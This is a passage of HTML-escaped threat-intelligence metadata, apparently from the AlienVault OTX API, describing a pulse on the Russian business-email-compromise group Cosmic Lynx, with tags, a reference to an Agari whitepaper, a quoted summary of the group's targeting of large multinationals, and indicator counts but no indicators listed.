&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'follower_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'groups':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'5f05965c766786e334704dd0',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'in_group':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_count':&nbsp;65,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_type_counts':&nbsp;{'domain':&nbsp;65},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'industries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_author':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_modified':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribing':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'locked':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'malware_families':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified':&nbsp;'2020-07-08T09:48:12.031000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified_text':&nbsp;'12&nbsp;days&nbsp;ago&nbsp;',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'name':&nbsp;'Cosmic&nbsp;Lynx:&nbsp;The&nbsp;Rise&nbsp;of&nbsp;A&nbsp;Russian&nbsp;BEC&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Group',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'public':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'pulse_source':&nbsp;'web',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'references':&nbsp;['https://www.agari.com/cyber-intelligence-research/whitepapers/acid-agari-cosmic-lynx.pdf'],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_is_active':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_type':&nbsp;'domain',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'subscriber_count':&nbsp;957,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'tags':&nbsp;['BEC',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Phishing',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'social&nbsp;engineering',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Russia',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Email',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'COVID-19'],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'targeted_countries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_has_agents':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_scannable':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'upvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'validator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'vote':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'votes_count':&nbsp;0},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{'TLP':&nbsp;'white',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'adversary':&nbsp;'Cosmic&nbsp;Lynx',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'attack_ids':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'author':&nbsp;{'avatar_url':&nbsp;'https://otx20-web-media.s3.amazonaws.com/media/avatars/user_2/resized/80/avatar_dacfad0ca8.png',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'2',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_following':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribed':&nbsp;True,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'username':&nbsp;'AlienVault'},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'cloned_from':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'comment_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'created':&nbsp;'2020-07-07T19:42:52.567000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'description':&nbsp;'\"We&nbsp;have&nbsp;observed&nbsp;more&nbsp;than&nbsp;200&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'BEC&nbsp;campaigns&nbsp;linked&nbsp;to&nbsp;Cosmic&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Lynx&nbsp;since&nbsp;July&nbsp;2019,&nbsp;targeting&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'individuals&nbsp;in&nbsp;46&nbsp;countries&nbsp;on&nbsp;six&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'continents.&nbsp;Unlike&nbsp;most&nbsp;BEC&nbsp;groups&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'that&nbsp;are&nbsp;relatively&nbsp;target&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'agnostic,&nbsp;Cosmic&nbsp;Lynx&nbsp;has&nbsp;a&nbsp;clear&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'target&nbsp;profile:&nbsp;large,&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'multinational&nbsp;organizations.&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Nearly&nbsp;all&nbsp;of&nbsp;the&nbsp;organizations&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Cosmic&nbsp;Lynx&nbsp;has&nbsp;targeted&nbsp;have&nbsp;a&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'significant&nbsp;global&nbsp;presence&nbsp;and&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'many&nbsp;of&nbsp;them&nbsp;are&nbsp;Fortune&nbsp;500&nbsp;or&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Global&nbsp;2000&nbsp;companies.\"&nbsp;-Agari',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'downvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'export_count':&nbsp;66,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'follower_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'groups':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'5f04d03c68918d97811bda03',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'in_group':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_count':&nbsp;65,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_type_counts':&nbsp;{'domain':&nbsp;65},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&